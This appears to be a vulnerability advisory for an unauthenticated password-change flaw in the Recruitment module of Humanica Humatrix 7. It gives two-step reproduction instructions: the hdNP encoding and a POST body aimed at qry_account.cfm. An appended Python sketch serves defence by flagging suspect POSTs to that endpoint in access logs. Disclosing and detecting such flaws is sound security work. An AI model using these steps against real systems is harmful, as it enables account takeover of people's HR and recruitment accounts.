Created
September 9, 2019 01:58
[Suggested description]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681
allows an unauthenticated attacker to change the password of any user via the
recruitment_online/personalData/act_acounttab.cfm
txtNewUserName and hdNP fields.
------------------------------------------
[Additional Information]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681
allows an unauthenticated attacker to change the password of any user.
Step 1:
Changing a password requires the hdNP parameter.
The obf() function on https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_acounttab.cfm
can be used to generate the hdNP parameter; the encoded value is obf(email+new_password).
Step 2:
POST to https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/qry_account.cfm
POST body:
Content-Disposition: form-data; name="txtNewUserName"
{E-mail}
Content-Disposition: form-data; name="hdNP"
{encode newpassword}
------------------------------------------
[Vulnerability Type]
Insecure Permissions
------------------------------------------
[Vendor of Product]
Humanica
------------------------------------------
[Affected Product Code Base]
Humatrix 7 - 1.0.0.203, 1.0.0.681
------------------------------------------
[Affected Component]
Recruitment module
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Unauthorized password change
------------------------------------------
[Attack Vectors]
Unauthorized password change
------------------------------------------
[Reference]
https://www.humatrix7.com/sunfish5/ehrm/humanica/recruitment_online/personalData/qry_account.cfm
------------------------------------------
[Discoverer]
Suphaphol Tanalertphan
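
Detection sketch for the two steps in [Additional Information], added here as an example and not part of the original advisory or the vendor's code: it scans web access logs for POSTs to qry_account.cfm that come from a client with no earlier Recruitment-module request, or that arrive in bursts. The combined log format, chronological ordering, case-insensitive path matching, the 30-minute window, the burst threshold and every sample line are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoint path comes from the advisory; log format and thresholds are assumptions.
MODULE = "/recruitment_online/"
TARGET = "/recruitment_online/personaldata/qry_account.cfm"
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3}')

def parse(line):
    """Return (ip, timestamp, method, lower-cased path) or None if unparseable."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0].lower()

def suspicious_password_posts(lines, lookback=timedelta(minutes=30), burst=3):
    """Return [(ip, timestamp, reason)] for suspect POSTs to the password endpoint."""
    history = defaultdict(list)  # ip -> [(timestamp, was_password_post)]
    alerts = []
    for ip, ts, method, path in filter(None, map(parse, lines)):
        if MODULE not in path:
            continue
        is_target = method == "POST" and path.endswith(TARGET)
        recent = [(t, p) for t, p in history[ip] if ts - t <= lookback]
        if is_target:
            if all(p for _, p in recent):  # nothing but password POSTs seen before
                alerts.append((ip, ts, "no prior module activity"))
            elif sum(p for _, p in recent) + 1 >= burst:
                alerts.append((ip, ts, "burst of password changes"))
        history[ip] = recent + [(ts, is_target)]
    return alerts

# Constructed sample log lines (documentation IP ranges, invented timestamps).
BASE = "/sunfish5/ehrm/humanica/recruitment_online/personalData/"
def _line(ip, hms, method, page):
    return f'{ip} - - [09/Sep/2019:{hms} +0000] "{method} {BASE}{page} HTTP/1.1" 200 512'

SAMPLE = [
    _line("198.51.100.7", "10:01:00", "GET", "act_acounttab.cfm"),
    _line("198.51.100.7", "10:02:00", "POST", "qry_account.cfm"),  # normal flow
    _line("203.0.113.9", "10:05:00", "POST", "qry_account.cfm"),   # direct POST
    _line("192.0.2.44", "10:10:00", "GET", "act_acounttab.cfm"),
    _line("192.0.2.44", "10:10:05", "POST", "qry_account.cfm"),
    _line("192.0.2.44", "10:10:09", "POST", "qry_account.cfm"),
    _line("192.0.2.44", "10:10:14", "POST", "qry_account.cfm"),    # third in a row
]
```

Access logs do not record the txtNewUserName value, so an alert here is a lead to correlate with application or database audit records of which account was changed.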